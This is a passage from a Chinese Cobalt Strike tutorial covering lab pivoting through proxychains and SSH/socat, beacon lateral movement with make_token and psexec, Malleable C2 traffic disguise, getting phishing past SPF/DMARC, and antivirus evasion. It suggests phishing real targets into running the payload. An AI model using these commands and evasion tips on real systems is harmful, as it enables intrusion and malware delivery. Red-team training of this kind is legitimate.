<span class="token namespace">[proxychains]</span> preloading <span class="token operator">/</span>usr<span class="token operator">/</span>lib<span class="token operator">/</span>x86_64<span class="token operator">-</span>linux<span class="token operator">-</span>gnu<span class="token operator">/</span>libproxychains<span class="token punctuation">.</span>so<span class="token punctuation">.</span>4
<span class="token namespace">[proxychains]</span> DLL init: proxychains<span class="token operator">-</span>ng 4<span class="token punctuation">.</span>14
Starting Nmap 7<span class="token punctuation">.</span>80 <span class="token punctuation">(</span> https:<span class="token operator">/</span><span class="token operator">/</span>nmap<span class="token punctuation">.</span>org <span class="token punctuation">)</span> at 2020<span class="token operator">-</span>09<span class="token operator">-</span>07 23:05 EDT
<span class="token namespace">[proxychains]</span> Strict chain  <span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span>  192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>175<span class="token punctuation">.</span>200:9527  <span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span>  192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>132:80  <span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span>  OK
<span class="token namespace">[proxychains]</span> Strict chain  <span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span>  192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>175<span class="token punctuation">.</span>200:9527  <span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span>  192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>132:445  <span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span>  OK
<span class="token namespace">[proxychains]</span> Strict chain  <span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span>  192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>175<span class="token punctuation">.</span>200:9527  <span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span>  192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>132:3389  <span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span>  OK
<span class="token namespace">[proxychains]</span> Strict chain  <span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span>  192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>175<span class="token punctuation">.</span>200:9527  <span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span>  192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>132:443 &lt;<span class="token operator">--</span>denied
Nmap scan report <span class="token keyword">for</span> 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>132
Host is up <span class="token punctuation">(</span>0<span class="token punctuation">.</span>19s latency<span class="token punctuation">)</span><span class="token punctuation">.</span>

PORT     STATE  SERVICE
80<span class="token operator">/</span>tcp   open   http
443<span class="token operator">/</span>tcp  closed https
445<span class="token operator">/</span>tcp  open   microsoft<span class="token operator">-</span>ds
3389<span class="token operator">/</span>tcp open   ms<span class="token operator">-</span>wbt<span class="token operator">-</span>server

Nmap done: 1 IP address <span class="token punctuation">(</span>1 host up<span class="token punctuation">)</span> scanned in 14<span class="token punctuation">.</span>35 seconds
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br><span class="line-number">14</span><br><span class="line-number">15</span><br><span class="line-number">16</span><br><span class="line-number">17</span><br><span class="line-number">18</span><br><span class="line-number">19</span><br></div></div><p>通过扫描可以看到目标 80 端口是开放的，接下来使用 curl 作为对比示例。</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>curl 192.168.232.132
proxychains curl 192.168.232.132
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>&gt; curl 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>132
curl: <span class="token punctuation">(</span>7<span class="token punctuation">)</span> Failed to connect to 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>132 port 80: No route to host

&gt; proxychains curl 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>132
<span class="token namespace">[proxychains]</span> config file found: <span class="token operator">/</span>etc<span class="token operator">/</span>proxychains<span class="token punctuation">.</span>conf
<span class="token namespace">[proxychains]</span> preloading <span class="token operator">/</span>usr<span class="token operator">/</span>lib<span class="token operator">/</span>x86_64<span class="token operator">-</span>linux<span class="token operator">-</span>gnu<span class="token operator">/</span>libproxychains<span class="token punctuation">.</span>so<span class="token punctuation">.</span>4
<span class="token namespace">[proxychains]</span> DLL init: proxychains<span class="token operator">-</span>ng 4<span class="token punctuation">.</span>14
<span class="token namespace">[proxychains]</span> Strict chain  <span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span>  192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>175<span class="token punctuation">.</span>200:9527  <span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span>  192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>132:80  <span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span>  OK
&lt;<span class="token operator">!</span>DOCTYPE html PUBLIC <span class="token string">&quot;-//W3C//DTD XHTML 1.0 Strict//EN&quot;</span> <span class="token string">&quot;http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd&quot;</span>&gt;
&lt;html xmlns=<span class="token string">&quot;http://www.w3.org/1999/xhtml&quot;</span>&gt;
&lt;head&gt;
&lt;meta http<span class="token operator">-</span>equiv=<span class="token string">&quot;Content-Type&quot;</span> content=<span class="token string">&quot;text/html; charset=iso-8859-1&quot;</span> <span class="token operator">/</span>&gt;
……内容太多，此处省略……                 
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br></div></div><h2 id="_2、反向转发">2、反向转发 <a href="#_2、反向转发" class="header-anchor">#</a></h2> <p>反向转发顾名思义就是和<a href="https://teamssix.com/year/200419-150644.html" target="_blank" rel="noopener noreferrer">上一节<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a>中提到的转发路径相反，之前我们设置的代理是 <code>CS服务端 --&gt; 上线主机 --&gt; 内网主机</code>，反向转发则是 <code>内网主机 --&gt; 上线主机 --&gt; CS服务端</code>。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs21-1.png" alt=""></p> <p>继续使用上面的演示环境，首先右击上线主机会话，选择 <code>Pivoting --&gt; Listener</code> ，除了 Name 选项之外，CS 都会自动配置好，这里直接使用默认的配置信息。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs21-2.png" alt=""></p> <p>之后生成一个 Windows 可执行文件，选择上一步生成的监听器，如果目标是 64 位则勾选使用 x64 Payload 的选项。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs21-3.png" alt=""></p> <p>之后将该可执行文件在目标主机上执行即可，在现实环境中可以尝试使用钓鱼邮件的方式诱导目标执行。</p> <p>当目标执行该文件后，就会发现当前不出网的 192.168.232.132 主机已经上线了。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs21-4.png" alt=""></p> <p>有一说一，关于这部分网上大部分教程还是 CS 3.x 版本的教程，而在 4.0 的操作中个人感觉要方便很多。</p> <p>网上关于这部分内容的 CS 4.0 的教程真的是少之又少，一开始在参考 3.x 教程的时候踩了很多坑，最后终于某内部知识库发现了一篇关于这部分内容的 4.0 教程，在该教程的参考下才发现居然如此简单。</p> <h2 id="_3、通过-ssh-开通通道">3、通过 SSH 开通通道 <a href="#_3、通过-ssh-开通通道" class="header-anchor">#</a></h2> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs22-1.png" alt=""></p> <p>1、连接到上图中蓝色区域里的 PIVOT 主机并开启端口转发</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>ssh -D 1080 user@&lt;blue pivot&gt;
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><blockquote><p>该命令中的 -D 参数会使 SSH 建立一个 socket，并去监听本地的 1080 端口，一旦有数据传向那个端口，就自动把它转移到 SSH 连接上面，随后发往远程主机。</p></blockquote> <p>2、在红色区域的 PIVOT 主机上开启通过 SSH Socks 的 445 端口转发</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>socat TCP4-LISTEN:445,fork SOCKS4:127.0.0.1:&lt;target&gt;:445
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><blockquote><p>socat 可以理解成 netcat 的加强版。socat 建立 socks 连接默认端口就是 1080 ，由于我们上面设置的就是 1080，因此这里不需变动。如果设置了其他端口，那么这里还需要在命令最后加上 <code>,socksport=&lt;port&gt;</code> 指定端口才行。</p></blockquote> <p>3、在攻击者控制的主机上运行 beacon，使其上线</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>注意需要使用 administrator 权限运行 beacon
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>4、在上线的主机上运行以下命令</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>make_token [DOMAIN\user] [password]
jump psexec_psh &lt;red pivot&gt; [listener]
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><p>整体的流程就是下面这张图一样。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs22-2.png" alt=""></p> <p><strong>演示</strong></p> <p>我在本地搭建了这样的一个环境。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs22-3.png" alt=""></p> <ol><li>首先使 Win1 主机上线，接着在 Linux1 主机上通过 SSH 连接到 Linux2 主机。</li></ol> <div class="language- line-numbers-mode"><pre class="language-text"><code>ssh -D 1080 user@192.168.175.146
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>&gt; ssh <span class="token operator">-</span>D 1080 user@192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>175<span class="token punctuation">.</span>146
user@192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>175<span class="token punctuation">.</span>146's password: 
Last login: Fri Jul 31 20:00:54 2020 <span class="token keyword">from</span> 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>175<span class="token punctuation">.</span>1
user@ubuntu:~$ 
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br></div></div><p>2、在 Linux1 主机上开启 445 端口转发</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>socat TCP4-LISTEN:445,fork SOCKS4:127.0.0.1:192.168.232.132:445
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>3、在 Win1 主机上运行以下命令使 Win2 上线</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>make_token teamssix\administrator Test123!
jump psexec_psh 192.168.175.200 smb
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>beacon&gt; make_token teamssix\administrator Test123<span class="token operator">!</span>
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to create a token <span class="token keyword">for</span> teamssix\administrator
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 61 bytes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> Impersonated WINTEST\Administrator

beacon&gt; jump psexec_psh 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>175<span class="token punctuation">.</span>200 smb
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to run windows<span class="token operator">/</span>beacon_bind_pipe <span class="token punctuation">(</span>\\<span class="token punctuation">.</span>\pipe\msagent_532c<span class="token punctuation">)</span> on 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>175<span class="token punctuation">.</span>200 via Service Control Manager <span class="token punctuation">(</span>PSH<span class="token punctuation">)</span>
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 5886 bytes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> received output:
Started service 4aea3b9 on 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>175<span class="token punctuation">.</span>200
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 204473 bytes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> established link to child beacon: 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>132
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br></div></div><p>4、随后便可以看到通过 SSH 上线的主机</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs22-4.png" alt=""></p> <h1 id="_0x08-malleable-c2">0x08 Malleable C2 <a href="#_0x08-malleable-c2" class="header-anchor">#</a></h1> <h2 id="_1、malleable-命令和控制">1、Malleable 命令和控制 <a href="#_1、malleable-命令和控制" class="header-anchor">#</a></h2> <p>Malleable 是一种针对特定领域的语言，主要用来控制 Cobalt Strike Beacon</p> <p>在开启 teamserver 时，在其命令后指定配置文件即可调用，比如：</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>./teamserver [ip address] [password] [profile]
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><h2 id="_2、设置和使用">2、设置和使用 <a href="#_2、设置和使用" class="header-anchor">#</a></h2> <p><strong>定义事务指标</strong></p> <div class="language- line-numbers-mode"><pre class="language-text"><code>http-get {
	# 指标
}
http-post {
	# 指标
}
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br></div></div><p><strong>控制客户端和服务端指标</strong></p> <div class="language- line-numbers-mode"><pre class="language-text"><code>http-get {
	client {
		# 指标
	}
	server {
		# 指标
	}
}
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br></div></div><p><strong>set  操作</strong></p> <p>set 语句是给一个选项赋值的方法，以分号结束。</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>set useragent &quot;Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1)&quot;;
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>malleable 给了我们很多选项，比如：</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>jitter		# 控制 beacon 默认回连的抖动因子
maxdns		# 控制最大 DNS 请求，限制最大数量可以使 DNS Beacon 发送数据看起来正常些
sleeptime	# 控制 beacon 的全部睡眠时间
spawnto
uri
useragent	# 控制每次发送请求的 useragent
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br></div></div><p><code>sleeptime</code> 和 <code>jitter</code> 两个选项是很重要的</p> <p><strong>添加任意 headers</strong></p> <div class="language- line-numbers-mode"><pre class="language-text"><code>header &quot;Accept&quot; &quot;text/html,application/xhtml&quot;;
header &quot;Referer&quot; &quot;https://www.google.com&quot;;
header &quot;Progma&quot; &quot;no-cache&quot;;
header &quot;Cache-Control&quot; &quot;no-cache&quot;;
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br></div></div><p><strong>其他指标</strong></p> <div class="language- line-numbers-mode"><pre class="language-text"><code>header &quot;header&quot; &quot;value&quot;;
parameter &quot;key&quot; &quot;value&quot;;
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><p><strong>转换/存储数据</strong></p> <div class="language- line-numbers-mode"><pre class="language-text"><code>metadata {
    netbios;
    append &quot;-.jpg&quot;;
    uri-append;
}
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br></div></div><p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs23-1.png" alt=""></p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs23-2.png" alt=""></p> <h2 id="_3、配置语言">3、配置语言 <a href="#_3、配置语言" class="header-anchor">#</a></h2> <div class="language- line-numbers-mode"><pre class="language-text"><code>append &quot;string&quot;
base64
netbios
netbiosu
prepend &quot;string&quot;
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br></div></div><h2 id="_4、测试配置文件">4、测试配置文件 <a href="#_4、测试配置文件" class="header-anchor">#</a></h2> <p>在GitHub 上有一些配置文件的示例，项目地址：<a href="https://github.com/rsmudge/Malleable-C2-Profiles" target="_blank" rel="noopener noreferrer">https://github.com/rsmudge/Malleable-C2-Profiles<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <p>这一节将使用该项目中的 <code>Malleable-C2-Profiles/APT/havex.profile</code> 配置文件作为示例。</p> <p><strong>测试配置文件是否有效</strong></p> <p>可以使用 c2lint 工具对配置文件进行测试，以判断配置文件编写的是否有效。</p> <p>来到 cobalt strike 目录下，可以看到有一个 c2lint 文件，该文件需要在 Linux 下运行。</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>./c2lint [profile]
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>在运行的结果中，绿色正常（这里更像青色），黄色告警，红色错误，比如运行 <code>Malleable-C2-Profiles</code> 项目里的 <code>havex.profile</code> 文件。</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>./c2lint ./Malleable-C2-Profiles/APT/havex.profile
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs24-1.png" alt=""></p> <p>当配置文件存在错误的时候，就会以红色显示出来</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs24-2.png" alt=""></p> <p><strong>运行 teamserver</strong></p> <div class="language- line-numbers-mode"><pre class="language-text"><code>./teamserver [teamserver_ip] [teamserver_password] [profile]
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><div class="language- line-numbers-mode"><pre class="language-text"><code>&gt; ./teamserver 192.168.12.2 password ./Malleable-C2-Profiles/APT/havex.profile
[*] Will use existing X509 certificate and keystore (for SSL)
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
[+] I see you're into threat replication. ./Malleable-C2-Profiles/APT/havex.profile loaded.
[+] Team server is up on 50050
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br></div></div><p>这里调用的 havex.profile 配置文件，该配置文件里对 cookie 进行了 base64 编码。</p> <p>开启 cobalt strike 后，使主机上线，通过 wireshark 抓包可以发现数据包确实符合这些特征。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs24-3.png" alt=""></p> <p>关于 Malleable C2 文件的使用，这里只是大概记录了一些，想了解更多关于 Malleable C2 文件的内容或者注意事项等，可以参考 A-TEAM 团队的 CS 4.0 用户手册。</p> <h1 id="_0x09-免杀">0x09 免杀 <a href="#_0x09-免杀" class="header-anchor">#</a></h1> <p>Cobalt Strike 不是什么工作情况都能胜任的工具，因此就需要我们根据不同的情况去做一些辅助工作。</p> <h2 id="_1、dkim、spf-和-dmarc">1、DKIM、SPF 和 DMARC <a href="#_1、dkim、spf-和-dmarc" class="header-anchor">#</a></h2> <p>SPF、DKIM、DMARC 都是邮件用于帮助识别垃圾信息的附加组件，那么作为一个攻击者，在发送钓鱼邮件的时候，就需要使自己的邮件能够满足这些组件的标准，或者发送到未配置这些组件的域。</p> <p>在理解这些防御标准前，需要先理解如何在因特网上通过 SMTP 发送邮件。</p> <p><strong>SMTP</strong></p> <p>发送一封邮件的过程大概是下面这个样子，这里以QQ邮箱为例。</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>&gt; telnet smtp.qq.com 25
HELO teamssix
auth login
base64编码后的邮箱名
base64编码后的授权码
MAIL FROM: &lt;evil_teamssix@qq.com&gt;
RCPT TO: &lt;target_teamssix@qq.com&gt;
DATA
邮件内容
.
QUIT
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br></div></div><p><strong>防御策略</strong></p> <h3 id="dkim">DKIM <a href="#dkim" class="header-anchor">#</a></h3> <p>DKIM <code>DomainKeys Identified Mail</code> 域名密钥识别邮件，DKIM 是一种防范电子邮件欺诈的验证技术，通过消息加密认证的方式对邮件发送域名进行验证。</p> <p>邮件接收方接收邮件时，会通过 DNS 查询获得公钥，验证邮件 DKIM 签名的有效性，从而判断邮件是否被篡改。</p> <h3 id="spf">SPF <a href="#spf" class="header-anchor">#</a></h3> <p>SPF <code>Sender Policy Framework</code> 发送人策略框架，SPF 主要用来防止随意伪造发件人。其做法就是设置一个 SPF 记录，SPF 记录实际上就是 DNS 的 TXT 记录。</p> <p>如果邮件服务器收到一封来自 IP 不在 SPF 记录里的邮件则会退信或者标记为垃圾邮件。</p> <p>我们可以使用以下命令查看目标的 SPF 记录。</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>dig +short TXT target.com
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><div class="language- line-numbers-mode"><pre class="language-text"><code>&gt; dig +short TXT qq.com
&quot;v=spf1 include:spf.mail.qq.com -all&quot;
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><p>上面的 <code>include:spf.mail.qq.com</code> 表示引入<code>spf.mail.qq.com</code>域名下的 SPF 记录。</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>&gt; dig +short TXT spf-a.mail.qq.com
&quot;v=spf1 ip4:203.205.251.0/24 ip4:103.7.29.0/24 ip4:59.36.129.0/24 ip4:113.108.23.0/24 ip4:113.108.11.0/24 ip4:119.147.193.0/24 ip4:119.147.194.0/24 ip4:59.78.209.0/24 ip4:113.96.223.0/24 ip4:183.3.226.0/24 ip4:183.3.255.0/24 ip4:59.36.132.0/24 -all&quot;
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><p>上面的 <code>ip4:203.205.251.0/24 ip4:103.7.29.0/24</code> 表示只允许这个范围内的 IP 发送邮件。</p> <h3 id="dmarc">DMARC <a href="#dmarc" class="header-anchor">#</a></h3> <p>DMARC <code>Domain-based Message Authentication, Reporting &amp; Conformance</code> 基于域的消息认证，报告和一致性。</p> <p>它用来检查一封电子邮件是否来自所声称的发送者。DMARC 建立在 SPF 和 DKIM 协议上, 并且添加了域名对齐检查和报告发送功能。这样可以改善域名免受钓鱼攻击的保护。</p> <p>可以使用下面的命令查看目标的的 DMARC 记录。</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>dig +short TXT _dmarc.target.com
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><div class="language- line-numbers-mode"><pre class="language-text"><code>&gt; dig +short TXT _dmarc.qq.com
&quot;v=DMARC1; p=none; rua=mailto:mailauth-reports@qq.com&quot;
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><p>也有一些在线网站支持检测 SPF、DKIM、DMARC 的记录，比如 <a href="https://dmarcly.com/tools/" target="_blank" rel="noopener noreferrer">https://dmarcly.com/tools/<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <p>关于这些记录查询返回结果的解释可参考文章末的参考链接。</p> <p><strong>发送钓鱼邮件的一些注意事项</strong></p> <p>1、检测目标是否有 SPF 记录，如果有则可能会被拦截</p> <p>2、检测目标 DMARC 记录的 p 选项是否为 reject ，如果有则可能会被拒绝</p> <p>3、模板中嵌入的 URL 地址，不要使用 IP 地址，要保证使用完整的 URL地址</p> <p>4、邮件的附件中不能附上一些可执行文件，比如 exe 格式的文件，因为一些邮件过滤器可能会将这些可执行文件删除</p> <h2 id="_2、杀毒软件">2、杀毒软件 <a href="#_2、杀毒软件" class="header-anchor">#</a></h2> <p>这一节将来看看杀毒软件相关的概念，毕竟知己知彼才能百战不殆，最后会介绍一下常见的免杀方法。</p> <p>常规杀毒软件的目的就是发现已知病毒并中止删除它，而作为攻击者则需要对病毒文件进行免杀处理，从而使杀毒软件认为我们的文件是合法文件。</p> <p><strong>杀软受到的限制</strong></p> <p>1、杀毒软件不能把可疑文件删除或者结束运行，否则用户的正常操作可能就会受到影响，同时也会对杀毒软件公司的声誉、口碑产生影响。</p> <p>2、杀毒软件不能占用太多的系统资源，否则用户可能会考虑卸载杀毒软件。</p> <p>3、大多数杀毒软件的一个弱点就是只会在浏览器下载文件或者文件被写入磁盘时才会检查这个文件的特征码，也就是说在这种情况下才会检查文件是否是病毒。</p> <p><strong>如何工作</strong></p> <p>1、在大多数杀毒软件背后都会有一个已知病毒的签名数据库，通过将当前文件的特征码与病毒签名数据库进行比对，如果一致则说明该文件是病毒。</p> <p>2、同时一些杀毒软件也会去发现用户的一些可疑行为，而且杀毒软件对这种可疑行为的判定会下比较大的功夫。因为如果误杀，造成的后果可能对用户来说是比较严重的。</p> <p>3、一些杀毒软件会在沙箱环境中去运行可疑文件，然后根据该可疑文件的行为判断是否为病毒。</p> <h3 id="如何免杀">如何免杀 <a href="#如何免杀" class="header-anchor">#</a></h3> <p>首先要判断目标使用了哪款杀毒软件，然后自己在虚拟机中去尝试绕过它。</p> <p>其次可以使用 Cobalt Strike 的 Artifact Kit 组件制作免杀可执行文件。Artifact Kit 是一个制作免杀 EXE、DLL 和 Service EXE 的源代码框架，在 Cobalt Strike 的 <code>Help --&gt; Arsenal</code> 处可下载 Artifact Kit。</p> <p>Artifact Kit 的工作原理大概如下：</p> <p>1、将病毒文件进行混淆处理，使杀毒软件将其判定为可疑文件而不是病毒文件。这种混淆可以逃避那些使用简单字符串搜索来识别恶意代码的杀毒软件。</p> <p>2、对病毒文件进行一些处理，以绕过沙箱检测。比如 Artifact Kit 中的 src-common/bypass-pipe.c 